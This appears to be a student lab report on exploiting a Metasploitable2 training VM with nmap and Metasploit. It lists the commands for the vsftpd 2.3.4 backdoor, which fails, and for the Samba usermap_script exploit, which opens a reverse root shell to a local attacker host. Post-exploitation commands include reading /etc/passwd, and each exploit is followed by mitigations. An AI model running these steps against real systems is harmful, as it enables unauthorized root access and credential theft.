LAB 3: EXPLOITATION OF METASPLOITABLE2 USING METASPLOIT Student Name: Nishan Singh 1. INFORMATION GATHERING Command Used: nmap -sV 192.168.128.2 Open Ports, Services and Versions: | Port | Service | Version | |------|------------|----------------------------------| | 21 | FTP | vsftpd 2.3.4 | | 22 | SSH | OpenSSH 4.7p1 Debian | | 23 | Telnet | Linux telnetd | | 25 | SMTP | Postfix smtpd | | 53 | DNS | ISC BIND 9.4.2 | | 80 | HTTP | Apache httpd 2.2.8 | | 111 | RPC | rpcbind | | 139 | NetBIOS | Samba smbd 3.x | | 445 | SMB | Samba smbd 3.x | | 512 | exec | netkit-rsh rexecd | | 513 | login | rlogin | | 514 | shell | rshd | | 1099 | Java RMI | GNU Classpath grmiregistry | | 1524 | bindshell | Metasploitable root shell | | 2049 | NFS | Network File System | | 2121 | FTP | ProFTPD 1.3.1 | | 3306 | MySQL | MySQL 5.0.51a-Ubuntu5 | | 5432 | PostgreSQL | PostgreSQL 8.3.7 | | 5900 | VNC | VNC Protocol 3.3 | | 6667 | IRC | UnrealIRCd | | 8180 | HTTP | Apache Tomcat/Coyote JSP | 2. VULNERABILITY 1 — VSFTPD 2.3.4 BACKDOOR Description: VSFTPD version 2.3.4 contains a malicious backdoor that may allow attackers to gain unauthorized remote access to a vulnerable server. If successfully exploited, the attacker can execute commands on the target machine. Metasploit Module: exploit/unix/ftp/vsftpd_234_backdoor Methodology: 1. Started Metasploit Framework. 2. Searched for VSFTPD exploit modules. search vsftpd 3. Selected the VSFTPD exploit. use exploit/unix/ftp/vsftpd_234_backdoor 4. Configured the target host. set RHOSTS 192.168.128.2 5. Executed the exploit. run Result: The exploit was attempted against the FTP service running on port 21. However, a shell session was not successfully established. Mitigation: - Upgrade VSFTPD to a supported and patched version. - Disable FTP services if not required. - Restrict FTP access using firewall rules. - Regularly apply security updates and patches. 3. VULNERABILITY 2 — SAMBA USERMAP SCRIPT Description: The Samba Usermap Script vulnerability allows unauthenticated remote command execution. An attacker can exploit this flaw to execute arbitrary commands and gain control of the target system. Metasploit Module: exploit/multi/samba/usermap_script Methodology: 1. Started Metasploit Framework. 2. Searched for Samba exploit modules. search samba usermap 3. Selected the Samba Usermap Script exploit. use exploit/multi/samba/usermap_script 4. Configured the target and local host. set RHOSTS 192.168.128.2 set LHOST 192.168.128.4 5. Executed the exploit. run 6. A command shell session was successfully opened. 7. Performed post-exploitation activities: whoami uname -a cat /etc/passwd Result: The exploit successfully established a command shell session and provided root-level access to the Metasploitable2 machine. Evidence: whoami Output: root uname -a Output: Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux cat /etc/passwd Output: Displayed user account information from the target system. Mitigation: - Upgrade Samba to the latest secure version. - Disable SMB services if not required. - Restrict SMB access to trusted networks only. - Apply vendor security patches regularly. - Monitor logs and network traffic for suspicious activity. 4. CONCLUSION This lab demonstrated how vulnerable services can be identified using Nmap and exploited using Metasploit. The VSFTPD exploit was attempted but did not establish a shell session. The Samba Usermap Script exploit successfully provided root-level access to the target system. This exercise highlights the importance of patch management, secure service configuration, and network access controls in protecting systems from exploitation.